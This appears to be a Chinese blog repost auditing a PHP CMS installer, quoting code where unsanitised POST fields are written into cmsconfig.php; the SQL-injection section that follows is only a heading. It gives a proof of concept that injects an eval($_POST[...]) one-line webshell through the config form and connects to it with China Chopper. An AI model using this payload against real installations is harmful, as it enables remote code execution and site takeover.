标签:head dbn fun 配置 step msconfig 方式 root 处理
00x1 安装漏洞
install/cmsconfig.php
1 function step4(){ 2 $root=$_POST["root"]; 3 $dbuser=$_POST["dbuser"]; 4 $dbpsw=$_POST["dbpsw"]; 5 $dbname=$_POST["dbname"]; 6 $tabhead=$_POST["tabhead"]; 7 8 $ad_user=$_POST["ad_user"]; 9 $ad_psw=$_POST["ad_psw"]; 10 11 $webname=$_POST["webname"]; 12 $weburl=$_POST["weburl"]; 13 $webinfo=$_POST["webinfo"]; 14 $webkeywords=$_POST["webkeywords"]; 15 $webauthor=$_POST["webauthor"];
这几个都是可控的,并没有进行任何处理。然后传到了$text2,然后又写到了cmsconfig.php当中。
1 $file="config_empty.php"; 2 $fp=fopen($file,"r"); //以写入方式打开文件 3 $text2=fread($fp,4096); //读取文件内容 4 $text2=str_replace(‘@root@‘,$root,$text2); 5 $text2=str_replace(‘@dbuser@‘,$dbuser,$text2); 6 $text2=str_replace(‘@dbpsw@‘,$dbpsw,$text2); 7 $text2=str_replace(‘@dbname@‘,$dbname,$text2); 8 $text2=str_replace(‘@tabhead@‘,$tabhead,$text2); 9 $text2=str_replace(‘@webname@‘,$webname,$text2); 10 $text2=str_replace(‘@weburl@‘,$weburl,$text2); 11 $text2=str_replace(‘@webinfo@‘,$webinfo,$text2); 12 $text2=str_replace(‘@webkeywords@‘,$webkeywords,$text2); 13 $text2=str_replace(‘@webauthor@‘,$webauthor,$text2); 14 $file="../cmsconfig.php"; //定义文件 15 $fp=fopen($file,"w"); //以写入方式打开文件 16 fwrite($fp,$text2); 17 @unlink("goinstall.php");
这个漏洞比较简单,直接在配置信息中填写一句话闭合就可以getshell了。
POC:"@eval($_POST[‘xishaonian‘])
然后菜刀直接连接就cmsconfig.php即可。
00x2 SQL注入
标签:head dbn fun 配置 step msconfig 方式 root 处理
原文地址:http://www.cnblogs.com/xishaonian/p/7453483.html
